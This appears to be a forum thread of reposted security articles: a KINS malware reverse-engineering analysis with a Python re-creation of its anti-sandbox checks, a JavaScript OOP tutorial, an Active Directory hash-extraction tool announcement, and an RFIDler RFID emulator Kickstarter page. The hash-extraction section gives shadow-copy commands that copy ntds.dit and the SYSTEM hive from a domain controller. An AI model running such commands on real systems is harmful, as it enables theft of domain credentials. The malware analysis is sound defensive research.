The last fully copy&pasted code contains OS-based tasks. It starts by determining whether KINS is running under WOW64 or not. The status is saved inside a boolean flag, and after that it tries to add a new full-access security descriptor. Once again it saves the result of the operation - not in a flag variable this time, but in a structure with information about the security descriptor. An empty structure means an error during the task.
If everything goes fine, KINS produces a 16-byte identifier based on the volume GUID path:

41D9C0 push 64h ; cchBufferLength
41D9C2 lea eax, [ebp+74h+szVolumeName]
41D9C5 push eax ; lpszVolumeName
41D9C6 lea eax, [ebp+74h+szVolumeMountPoint]
41D9CC push eax ; lpszVolumeMountPoint
41D9CD call edi ; GetVolumeNameForVolumeMountPointW
41D9CF test eax, eax ; check the result
41D9D1 jz short GetVolumeNameForVolumeMountPointW_FAILS
41D9D3 cmp [ebp+74h+sz], '{' ; a minor check over the obtained string
41D9D8 jnz short ERROR
41D9DA push [ebp+74h+pclsid] ; pclsid
41D9DD xor eax, eax
41D9DF mov [ebp+74h+var_68], ax ; str[38] = 0;
41D9E3 lea eax, [ebp+74h+sz]
41D9E6 push eax ; lpsz
41D9E7 call ds:CLSIDFromString ; obtains:

GetVolumeNameForVolumeMountPoint could fail, and in that case the snippet above can be executed more than once. The first lpszVolumeMountPoint value is obtained by calling SHGetFolderPath. If GetVolumeNameForVolumeMountPoint fails, a new lpszVolumeMountPoint string is obtained by cutting off the last part of it (using PathRemoveFileSpec). I.e.: it tries "C:\WINDOWS\" first and then "C:\" only.

From the organization of the code and the large variety of flags/variables used, it seems there is a big focus on details. If something goes wrong, or if KINS thinks it doesn't have the right conditions to run, it stops running. For example, KINS uses a variable to store a value obtained from the combination of the OS version and the integrity level; if the value falls outside a range of specific acceptable values, the malware stops. That's why Zeus was, from some points of view, a masterpiece. Yes, I said Zeus, and you know why.

Copy&paste with minor changes

This happens when the code structure of a procedure is the same as in the original version but there are some changes or additions. It's the case for the InitLoadModules function; basically it's a sequence of DecryptString/GetProcAddress calls. The list of function addresses to retrieve is slightly changed from Zeus. The new list is composed of: NtCreateThread, NtCreateUserProcess, NtQueryInformationProcess, NtQueryInformationThread, RtlUserThreadStart, NtMapViewOfSection, NtUnmapViewOfSection, NtSuspendProcess, NtResumeProcess, NtClose and LdrFindEntryForAddress. I don't know whether it's a KINS addition or it's taken from a newer Zeus version. I'm not a security expert and I can't access all the possible Zeus versions, but it's a doubt I have: KINS takes some concepts from Zeus versions beyond the one I'm referring to (2.0.8.9).

Copy&paste from a more recent Zeus version

Here's a practical example of my doubt: the anti-analysis check routine! As I said before, KINS runs only under particular conditions, and its continuation depends on the values returned by the 8 calls made here.
Every call performs a specific check:

- CheckForPopupKiller: looks for the file "C:\popupkiller.exe"; if it exists, KINS aborts
- CheckForExecuteExe: another unwanted file on the system is "C:\TOOLS\execute.exe"
- CheckForSbieDll: time for a dll check - it tries to load "SbieDll.dll" (a Sandboxie-related dll) and does not want that dll on the system
- CheckMutexFrz_State: the mutex under observation is Frz_State, which belongs to the Deep Freeze software
- CheckForNPF_NdisWanIp: the network-tool check - KINS doesn't want "\\.\NPF_NdisWanIp" on the system
- CheckForVMWareRelatedFiles: VMware is strictly prohibited; "\\.\HGFS" and "\\.\vmci" are the files to look for
- CheckForVBoxGuest: VirtualBox is prohibited too ("\\.\VBoxGuest")
- CheckForSoftwareWINERegKey: checks for the existence of the registry key "Software\WINE"

If one of the calls above fails, KINS aborts its execution immediately. There's no trace of this code inside Zeus_leaked_source_code, but I have read some articles on the net talking about this specific snippet. You can read something here.

Snippets based on Zeus with KINS-specific features

That's the most interesting part of the malware's Init, the place where something new joins the party! In this part of the code the malware tries to create some Id values based on machine components and properties (computer name, version information, install date, GUID, physical memory and volume serial number). Zeus does the same, but it uses a simple xor decryption, crc32 and RC4 in its calculations. KINS replaces all of that with its own virtual machine combined with crc32, RC4, the SHA-1 hash algorithm and some brain-blasting calculations. I won't go into details right here, but if you need them drop me a mail and I'll tell you more. Basically, the additions are strictly related to the use of the virtual machine only. I gave a description of the virtual machine here, but I didn't talk about its usage inside the malware. The VM is called a few times during the lifetime of the malware, but every time it modifies DataBuffer in the same way (meaning the algorithm produced by the VM is always the same). When the VM ends, a number of bytes from DataBuffer are taken for the specific usage; in this initialization process they are used as a key for the RC4 algorithm. Imho, it's quite a strange approach - I don't know why you would call the same algorithm many times, especially when the result is always the same. Maybe it's just a way to confuse the reversers out there, or maybe I'm missing something...

Is KINS a new myth or is it just born from the leaked Zeus source code? Well, I'm not a security expert and I can't say it for sure, but judging from what I've seen so far I think KINS is strongly based on Zeus_leaked_source_code - they have the same DNA! It's the same concept as in real life: KINS has something completely new, but the core comes from the father, Zeus. Anyway, this is only an introduction to the DNA paternity test. Now I would like to know if we can apply the same concept to all the features of both malwares. Maybe soon - now it's holiday time!

Sursa: KINS malware: initialization and DNA paternity test | My infected computer
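As an aside, the checklist above is also useful when preparing an analysis machine, because any one of these artifacts will make the sample bail out. The Python sketch below is my own quick re-creation of the same checks for a Windows analysis box - it is not KINS code, and the choice of HKEY_CURRENT_USER for the WINE key is an assumption - so you can see which tell-tale artifacts the malware would spot on your sandbox.

import ctypes, os, winreg

kernel32 = ctypes.windll.kernel32
kernel32.CreateFileW.restype = ctypes.c_void_p
kernel32.OpenMutexW.restype = ctypes.c_void_p
kernel32.LoadLibraryW.restype = ctypes.c_void_p

GENERIC_READ = 0x80000000
OPEN_EXISTING = 3
SYNCHRONIZE = 0x00100000
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value

def device_exists(path):
    # try to open the device object and see whether a handle comes back
    h = kernel32.CreateFileW(path, GENERIC_READ, 0, None, OPEN_EXISTING, 0, None)
    if h and h != INVALID_HANDLE_VALUE:
        kernel32.CloseHandle(ctypes.c_void_p(h))
        return True
    return False

def mutex_exists(name):
    h = kernel32.OpenMutexW(SYNCHRONIZE, False, name)
    if h:
        kernel32.CloseHandle(ctypes.c_void_p(h))
        return True
    return False

checks = {
    "C:\\popupkiller.exe": os.path.exists("C:\\popupkiller.exe"),
    "C:\\TOOLS\\execute.exe": os.path.exists("C:\\TOOLS\\execute.exe"),
    "SbieDll.dll loadable": bool(kernel32.LoadLibraryW("SbieDll.dll")),
    "Frz_State mutex": mutex_exists("Frz_State"),
    "\\\\.\\NPF_NdisWanIp": device_exists("\\\\.\\NPF_NdisWanIp"),
    "\\\\.\\HGFS": device_exists("\\\\.\\HGFS"),
    "\\\\.\\vmci": device_exists("\\\\.\\vmci"),
    "\\\\.\\VBoxGuest": device_exists("\\\\.\\VBoxGuest"),
}
try:                                   # assuming HKCU here - the real check may use another hive
    winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\WINE").Close()
    checks[r"Software\WINE key"] = True
except OSError:
    checks[r"Software\WINE key"] = False

for name, found in checks.items():
    print(("FOUND   " if found else "absent  ") + name)

Each entry mirrors one item in the list: file presence, a loadable Sandboxie dll, the Deep Freeze mutex, the WinPcap/VMware/VirtualBox device objects and the WINE registry key.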
-
JavaScript Object Oriented Programming (OOP) Tutorial

Object Oriented Programming is one of the most popular ways to program. Before OOP there was only a list of instructions executed one by one, but in OOP we deal with objects and how those objects interact with one another. JavaScript supports Object Oriented Programming, but not in the same way as other OOP languages (C++, PHP, Java, etc.). The main difference between these languages and JavaScript is that there are no classes in JavaScript, and classes are very important for creating objects. However, there is a way to simulate the class concept in JavaScript. Another important difference is data hiding: there are no access specifiers (public, private, protected) in JavaScript. Again, we will simulate the concept using variable scope in functions.

Object Oriented Programming Concepts
1) Object
2) Class
3) Constructor
4) Inheritance
5) Encapsulation
6) Abstraction
7) Polymorphism

Preparing the work space

Create a new file "oops.html" and write this code in it. We will write all our JavaScript code in this file.

<html>
<head>
<title>JavaScript Object Oriented Programming(OOPs) Tutorial</title>
</head>
<body>
<script type="text/javascript">
//Write your code here.....
</script>
</body>
</html>

1) Object

Any real-world entity can be considered an object. Every object will have some properties and functions. For example, consider a person as an object: he will have properties like name, age, etc. and functions such as walk, talk, eat, think, etc. Now let's see how we create objects in JavaScript. There are several ways to create objects in JavaScript. Some of them are:

//1)Creating Object through literal
var obj={};

//2)Creating with Object.create
var obj= Object.create(null);

//3)Creating using new keyword
function Person(){}
var obj=new Person();

We can use any of the above ways to create an object.

2) Class

As I said earlier, there are no classes in JavaScript, because JavaScript is a prototype-based language. But we can simulate the class concept using JavaScript functions.

function Person(){
    //Properties
    this.name="aravind";
    this.age="23";
    //functions
    this.sayHi=function(){
        return this.name +" Says Hi";
    }
}
//Creating person instance
var p=new Person();
alert(p.sayHi());

3) Constructor

The constructor is a concept that comes under the class concept. The constructor is used to assign values to the properties of the class when creating an object using the new operator. In the code above we used the name and age properties for the Person class; now we will assign values while creating new objects of the Person class, as below.

function Person(name,age){
    //Assigning values through constructor
    this.name=name;
    this.age=age;
    //functions
    this.sayHi=function(){
        return this.name +" Says Hi";
    }
}
//Creating person instance
var p=new Person("aravind",23);
alert(p.sayHi());
//Creating second person instance
var p=new Person("jon",23);
alert(p.sayHi());

4) Inheritance

Inheritance is the concept of one class acquiring the properties and functions of another class. For example, let's consider a "Student" class. The Student also has the properties name and age, and we already have these properties in the Person class, so it's much better to acquire the properties of Person instead of re-creating them. Now let's see how we can do inheritance in JavaScript.
function Student(){}

//1)Prototype based Inheritance
Student.prototype= new Person();

//2)Inheritance through Object.create
Student.prototype=Object.create(Person.prototype);

var stobj=new Student();
alert(stobj.sayHi());

We can do inheritance in either of the above two ways.

5) Encapsulation

Before we learn Encapsulation and Abstraction, first we need to know what data hiding is and how we can achieve it in JavaScript. Data hiding means protecting data from being accessed outside its scope. For example, in the Person class we have a Date of Birth (dob) property and we want to hide it from the outside. Let's see how we can do it.

function Person(){
    //this is a private variable
    var dob="8 June 2012";
    //public properties and functions
    return{
        age:"23",
        name:"aravind",
        getDob:function(){
            return dob;
        }
    }
}
var pobj=new Person();
//this will get undefined
//because it is private to Person
console.log(pobj.dob);
//Will get the dob value because we are using a public
//function to get the private data
console.log(pobj.getDob());

Now, Encapsulation means wrapping up public and private data into a single unit. The example above suits Encapsulation well.

6) Abstraction

Abstraction means hiding the inner implementation details and showing only the outer details. To understand Abstraction we need to understand the Abstract and Interface concepts from Java, but we don't have any direct Abstract or Interface in JS. OK, now in order to understand abstraction in JavaScript, let's take an example from the JavaScript library jQuery. In jQuery we use $("#ele") to select an element with id ele on a web page. Actually this code calls native JavaScript code, document.getElementById("ele"), but we don't need to know that - we can happily use $("#ele") without knowing the inner details of the implementation.

7) Polymorphism

The word Polymorphism in OOP means having more than one form. In JavaScript an Object, Property or Method can have more than one form. Polymorphism is a very useful feature for dynamic binding or late binding.

function Person(){
    this.sayHI=function(){}
};

//This will create the Student Class
function Student(){};
Student.prototype=new Person();
Student.prototype.sayHI=function(){
    return "Hi! I am a Student";
}

//This will create the Teacher Class
function Teacher(){};
Teacher.prototype=new Person();
Teacher.prototype.sayHI=function(){
    return "Hi! I am a Teacher";
}

var sObj=new Student();
//This will check if the student
//object is an instance of Person or not;
//if not, it won't execute our alert code.
if (sObj instanceof Person) {
    alert("Hurray! JavaScript supports OOP");
}

Conclusion

JavaScript supports Object Oriented Programming (OOP) concepts, though maybe not in the direct way; we need to simulate some of the concepts.

10 Aug 2013 by aravind buddha at 10:44 PM

Sursa: JavaScript Object Oriented Programming(OOP) Tutorial : Techumber
-
[h=1]Active Directory Password Hash Extraction[/h]

Just added a tool for offline Active Directory password hash extraction. It has very basic functionality right now, but much more is planned. It is a command-line application that runs on Windows only at the moment.

ntds_decode -s <FILE> -d <FILE> -m -i

-s <FILE> : SYSTEM registry hive
-d <FILE> : Active Directory database
-m : Machines (omitted by default)
-i : Inactive, Locked or Disabled accounts (omitted by default)

The SYSTEM registry hive and Active Directory database are taken from a domain controller. These files are obviously locked, so you need to back them up using the Volume Shadow Copy Service. The output format is similar to pwdump. LM and NTLM hashes are extracted from active user accounts only. ntds_decode mounts the SYSTEM file, so Administrator access is required on the computer you run it on.

If you're an experienced pen tester or Administrator who would like to test this tool, you can grab it from here. It's advisable that you don't use the tool unless you know what you're doing. Source isn't provided at the moment because it's too early to release. If you have questions about it, feel free to e-mail the address provided in README.txt.

Sursa: Active Directory Password Hash Extraction | Insecurety Research
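For reference, the usual way to obtain unlocked copies of those two files is to snapshot the system drive with the Volume Shadow Copy Service and copy them out of the snapshot. The lines below are a rough sketch of that approach on a domain controller you administer, not instructions from the tool's author; the shadow copy number and the default C:\Windows\NTDS database path are assumptions you should verify against the vssadmin output and your own NTDS configuration.

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\audit\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\audit\SYSTEM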
-
RFIDler - A Software Defined RFID Reader/Writer/Emulator

RFIDler (RFID Low-frequency Emulator & Reader). An open platform RFID reader/writer/emulator that can operate in the 125-134 kHz range.

Software Defined is the buzz-word in RF these days, and we use SDR (Software Defined Radio) in our work as reverse-engineers all the time, with great projects like HackRF and GNU Radio, etc. So when it came to looking at RFID for a recent engagement, we decided to see if we couldn't apply the same thinking to that technology. And guess what? Yes, you can!

One of our team, Adam Laurie (aka Code Monkey), has spent many years playing with RFID, and is the author of RFIDIOt, the open-source RFID python software library, so is very familiar with the higher-level challenges associated with these devices. However, a complete understanding of what goes on 'under the hood' is harder to come by, and it was only when he teamed up with Chip Monkey, Zac Franken, who has been hardware hacking and pulling things to bits (and putting them back together so they do something much more fun) since he was big enough to hold a screwdriver, that the full picture started to emerge...

The Goal

To produce a tool for Low Frequency (125-134 kHz) RFID research projects, as well as a cut-down (Lite) version that can be embedded into your own hardware projects. The fully featured version we hope to bring in for around £30.00, and the Lite version for under £20.00.

Features

We have written extensive firmware which includes a user interface and an API to allow easy use of the system and to allow you to explore, read and emulate a wide range of low frequency RFID tags.

Utilise ANY modulation scheme, including bi-directional protocols
Write data to tag
Read data from tag
Emulate tag
Sniff conversations between external reader & tag
Provide raw as well as decoded data
Built-in antenna
External antenna connection
USB power and user interface
TTL interface
GPIO interface
JTAG interface for programming
USB Bootloader for easy firmware updating
External CLOCK interface if not using processor
External power connector if not using USB

The hardware gives you the capability to read/write/emulate more or less any LF tag, but we've also taken the hard work out of most of them by implementing all the tag types we can find in the public domain. These include:

EM4102 / Unique
Hitag 1/2/S
FDX-B (ISO 11784/5 Animal Standard)
Q5
T55xx
Indala
Noralsy
HID Prox
NXP PCF7931
Texas Instruments
VeriChip
FlexPass

Firmware

We have working firmware that proves the concept, and we will continue to develop the code to provide both a command line interface and an API for end-user applications. This will be posted in a github repository, here: https://github.com/ApertureLabsLtd/RFIDler

Hardware

The three devices we will produce are:

RFIDler-LF-Nekkid - The bare naked circuit board with built-in antenna, ready for you to populate the electronic components yourself.
RFIDler-LF-Lite - This is the board with only the low-level RFID communication components, to allow you to incorporate it into your own projects (e.g. controlling it with Arduino, Raspberry Pi, Beagle-Bone etc.), providing GPIO, power and clock interfaces only. Firmware can be ported from (and/or contributed to) the RFIDler repository, or write your own from scratch.
RFIDler-LF-Standard - This is the fully populated Low Frequency (125/134 kHz) board with on-board processor that can be used as a stand-alone device for research and in-the-field testing etc., providing TTL and USB serial command line and API interfaces as well as raw GPIO, clock and power.

Your pledges will help us get this from working prototype to final production run, incorporate where possible any cool ideas/features that we hadn't thought of, and bring Software Defined RFID to the masses! The challenges we have left to complete are:

Processor selection - we've used the Pic32 as a proof-of-concept chip, but there may be others better suited to this kind of application. We will research and test 2 or 3 other chips before making a final decision.
Coil design - coils are almost as mysterious as RFID itself, so we need to try various designs to see which on-board and external coils give us the best performance across the target frequency ranges.
Final Board Layout - Layout the final boards and send to manufacturing.

Further Details

Here is Adam's blog entry on the subject: Obviously a Major Malfunction...: RFIDler - An open source Software Defined RFID Reader/Writer/Emulator

And here is the prototype:

And here we are reading an Indala PSK tag:

The logic analyser trace shows that RFIDler is pulsing on the PSK Reader line whenever there is a phase change on the analogue line (the small green pulses are negative, and the large ones positive). All our software has to do is detect those pulses at each bit period, and clock out the data. The 'Bitstream' line shows the software bit value detection in action, as it's being driven by the UBW32 board. The other nice thing we can do in software is monitor the quality of the read: the width of the reader pulse will narrow as the coil goes in and out of the field and the coils 'de-couple', so we can flag a read error when the pulse gets too narrow. This is important when you're looking at unknown tag types: the manufacturer may have built-in parity or other data checks so their native reader knows when it's getting a good read, but we don't have knowledge of the relevant algorithms, so we cannot do the same. With this technique, we can easily filter out bad reads that would give us corrupt data.

Of course, as well as reading a tag, we want to be the tag, so here we are emulating PSK: and we could do that for any bitrate, modulation scheme or data pattern (within reason), as well as have 2-way conversations (e.g. Hitag2). So that brings us to where we are now...

Timeframe

We've allowed the following timeframes for each stage:

Project starts in October (assuming we get funded!)
Full circuit design and CPU selection: 4 weeks, taking us to November.
Beta test phase: 6 weeks up to mid-December, then it's the Christmas & New Year break...
Final production run: 4 weeks starting in January, so we should be done by February.

We all know that in real life timescales slip, but since the underlying hardware is already proven in our prototype, and all we're really doing now is fine-tuning and incorporating feedback from the beta test, we expect this to be a fairly quick project!

Risks and challenges

We have great facilities in-house for prototyping electronic circuits, and so we expect the main challenges to have been worked out before we go to the trouble and expense of outside manufacturing.
However, we also have a great relationship with our fab company, who we have used for several years on many successful projects, so we know they have the resources to get the job done. We look forward to working with you!

Sursa: RFIDler - A Software Defined RFID Reader/Writer/Emulator by Aperture Labs Ltd. — Kickstarter